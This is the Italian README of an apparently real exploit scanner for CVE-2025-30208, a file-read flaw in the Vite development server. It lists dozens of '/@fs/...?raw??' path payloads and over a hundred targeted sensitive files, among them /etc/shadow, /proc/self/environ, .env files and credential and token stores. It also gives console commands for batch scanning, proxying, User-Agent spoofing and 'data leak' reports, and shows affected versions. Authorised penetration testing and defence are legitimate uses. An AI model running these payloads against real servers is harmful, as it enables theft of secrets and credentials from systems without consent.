
CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di gravità media nel server di sviluppo Vite (un popolare strumento di build per frontend)
Scanner avanzato per CVE-2025-30208 con funzionalità di livello enterprise
Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite
🚀 Avvio rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza
Questo è uno scanner completo per vulnerabilità progettato per rilevare e sfruttare la CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente la lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.
Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:
CVE-2025-30208.py - Applicazione principale dello scannerpayloads.py - Payload di sfruttamento avanzati (60+ varianti)sensitive_files.py - Database completo di file sensibili (200+ file)html_template.py - Template di reporting HTML migliorato in stile hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premi Invio due volte per terminare]
CVE-2025-30208 > scan
# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configura limitazione della velocità
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Genera un bellissimo report HTML
CVE-2025-30208 > pull
# Avvia il server web per visualizzare il report
CVE-2025-30208 > web
# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081
# Ferma il server web
CVE-2025-30208 > web off
Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:
/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url
/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8
/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug
/@fs/{percorso_file}?raw&esm
/@fs/{percorso_file}?raw&cjs
/@fs/{percorso_file}?raw&umd
/@fs/{percorso_file}?raw&js
/@fs/{percorso_file}?raw&ts
/@fs/{percorso_file}?raw&json
/@fs/{percorso_file}?raw&css
/@fs/{percorso_file}?raw&html
/app/{percorso_file}?raw??
/App/{percorso_file}?raw??
Lo strumento ora testa 200+ file sensibili organizzati in sensitive_files.py:
/etc/passwd - Informazioni sugli account utente/etc/shadow - Dati password crittografate/etc/services - Servizi di rete/etc/hosts - Mappatura hostname/etc/fstab - Tabella del file system/etc/ssh/sshd_config - Configurazione server SSH/etc/crontab - Cron job di sistema/etc/sudoers - Configurazione sudo/proc/version - Versione del kernel/proc/cpuinfo - Informazioni sulla CPU/proc/meminfo - Informazioni sulla memoria/proc/self/environ - Ambiente di processo/proc/self/cmdline - Riga di comando del processo/proc/net/tcp - Connessioni TCP/proc/net/udp - Connessioni UDP.env - Variabili d'ambiente.env.local - Ambiente locale.env.production - Ambiente di produzioneconfig.json - Configurazione applicazionesettings.json - Impostazioni applicazioneapplication.properties - Configurazione Springapplication.yml - Configurazione YAMLdatabase.yml - Configurazione databasesecrets.json - Gestione segretipackage.json - Dipendenze Node.jspackage-lock.json - Dipendenze bloccateyarn.lock - File lock Yarnvite.config.js - Configurazione Vitevite.config.ts - Configurazione Vite TypeScripttsconfig.json - Configurazione TypeScriptwebpack.config.js - Configurazione Webpacknext.config.js - Configurazione Next.jsnuxt.config.js - Configurazione Nuxt.jsangular.json - Configurazione Angularvue.config.js - Configurazione Vue.jsrollup.config.js - Configurazione Rollupeslint.config.js - Configurazione ESLint.git/config - Configurazione Git.gitignore - Regole ignore Git.gitattributes - Attributi Git.gitmodules - Sottomoduli Git.git/HEAD - Branch corrente.git/logs/HEAD - Log Git.git/refs/heads/master - Branch master.git/refs/heads/main - Branch mainREADME.md - Documentazione del progettoCHANGELOG.md - Registro modificheLICENSE - Informazioni sulla licenzaCONTRIBUTING.md - Linee guida per contributiAUTHORS - Informazioni sugli autoriTODO.md - Lista delle cose da fareROADMAP.md - Roadmap di sviluppoDockerfile - Configurazione Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - Configurazione override.dockerignore - Regole ignore Dockerdocker-compose.prod.yml - Configurazione produzionedocker-compose.dev.yml - Configurazione svilupponginx.conf - Configurazione Nginxapache2.conf - Configurazione Apachehttpd.conf - Configurazione HTTP daemon.htaccess - Controllo accessi Apacheweb.config - Configurazione IISrobots.txt - Direttive per motori di ricercasitemap.xml - Struttura del sitomanifest.json - Manifest dell'app websw.js - Service workerfirebase.json - Configurazione Firebasefirebase.rules - Regole di sicurezza Firebaseboot.ini - Configurazione di avvioautoexec.bat - Script di esecuzione automaticasystem.ini - Configurazione di sistemawin.ini - Configurazione WindowsUsers - Directory utentiWindows - File di sistemaProgram Files - Directory applicazioniSystem - File di sistemaLibrary - File libreriaApplications - File applicazioniprivate/etc/hosts - File hostsprivate/etc/passwd - Account utentedatabase.db - Database SQLitedatabase.sqlite - Database SQLitedata.db - Database datidump.sql - Dump del databaseschema.sql - Schema del databasemigrations - Migrazioni del databaselogs - Directory logerror.log - Log erroriaccess.log - Log accessiapp.log - Log applicazionedebug.log - Log debugcombined.log - Log combinatibackup - Directory backupbackup.sql - Backup databasebackup.zip - Backup compressodump - Dump datiexport - Esportazione datiauth.json - Configurazione autenticazionecredentials.json - Archivio credenzialikeys.json - Gestione chiavitokens.json - Archivio tokenjwt.json - Configurazione JWToauth.json - Configurazione OAuthapi.json - Configurazione APIswagger.json - Documentazione APIopenapi.json - Specifica OpenAPIgraphql.json - Configurazione GraphQLschema.json - Schema APIcloudformation.yml - AWS CloudFormationserverless.yml - Configurazione Serverlessterraform.tf - Configurazione Terraformkubernetes.yml - Configurazione Kubernetesk8s.yml - Configurazione Kubernetesanalytics.json - Configurazione analisimonitoring.json - Impostazione monitoraggiometrics.json - Configurazione metrichetelemetry.json - Dati telemetriaLo strumento ora genera bellissimi report HTML in stile hacker con:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Applicazione principale dello scanner
├── payloads.py # Payload di sfruttamento avanzati (60+)
├── sensitive_files.py # Database di file sensibili (200+)
├── html_template.py # Template di reporting HTML migliorato
├── README.md # Questa documentazione
├── requirements.txt # Dipendenze Python
├── logs/ # Directory file di log
├── data_leak.html # Report HTML generati
├── data_leak.json # Report JSON generati
└── session.json # Configurazioni sessione salvate
Accogliamo con favore i contributi per migliorare questo strumento:
payloads.pysensitive_files.pyhtml_template.pyQuesto progetto è concesso in licenza per scopi educativi e di test di sicurezza autorizzati esclusivamente.
⚠️ Disclaimer legale: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di testare qualsiasi sistema. Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento.
⭐ Se questo strumento ti è stato utile, lascia una stella! ⭐
Realizzato con ❤️ per la community della sicurezza
| Comando | Descrizione | Esempio |
|---|
set <opzione> <valore> | Imposta opzioni di configurazione | set RHOST 192.168.1.100 |
show options | Mostra le impostazioni correnti | show options |
edit | Editor interattivo delle opzioni | edit |
run / exploit | Esegui test di vulnerabilità | run |
batch | Scansione batch di più target | batch |
scan | Scopri file sensibili | scan |
pull | Esporta risultati in HTML/JSON | pull |
web [on|off|porta] | Server web per report HTML | web 8080 |
save | Salva configurazione della sessione | save |
load | Carica configurazione della sessione | load |
test | Testa la connettività al target | test |
validate | Valida la configurazione corrente | validate |
verbose | Attiva/disattiva modalità verbose | verbose |
proxy | Configura impostazioni proxy | proxy |
headers | Imposta header HTTP personalizzati | headers |
rate | Configura limitazione della velocità | rate |
log | Mostra informazioni di log | log |
help / ? | Mostra aiuto | help |
exit / quit | Esci dallo strumento | exit |
| Opzione | Descrizione | Predefinito | Validazione |
|---|
RHOST | Indirizzo host/IP del target | - | Validazione hostname/IP |
RPORT | Numero porta del target | - | Intervallo porte (1-65535) |
FILEPATH | Percorso file da testare | etc/passwd | Validazione percorso |
PROXY | URL proxy HTTP/HTTPS | - | Validazione formato URL |
VERBOSE | Abilita output verbose | false | Validazione booleana |
RATE_LIMIT | Ritardo tra le richieste (secondi) | 0.3 | Validazione numerica |
THREADS | Numero di thread per scansione batch | 5 | Validazione intera |
TIMEOUT | Timeout richiesta (secondi) | 5 | Validazione intera |
CUSTOM_HEADERS | Header HTTP personalizzati (JSON) | {} | Validazione formato JSON |
prettier.config.js - Configurazione Prettierjest.config.js - Configurazione Jestbabel.config.js - Configurazione Babeltailwind.config.js - Configurazione Tailwind CSS| File | Descrizione | Formato |
|---|
data_leak.html | Report vulnerabilità HTML migliorato in stile hacker | HTML |
data_leak.json | Esportazione JSON strutturata | JSON |
sensitive_files_discovery.json | File sensibili scoperti | JSON |
session.json | Configurazione sessione salvata | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Log di audit dettagliati | Testo |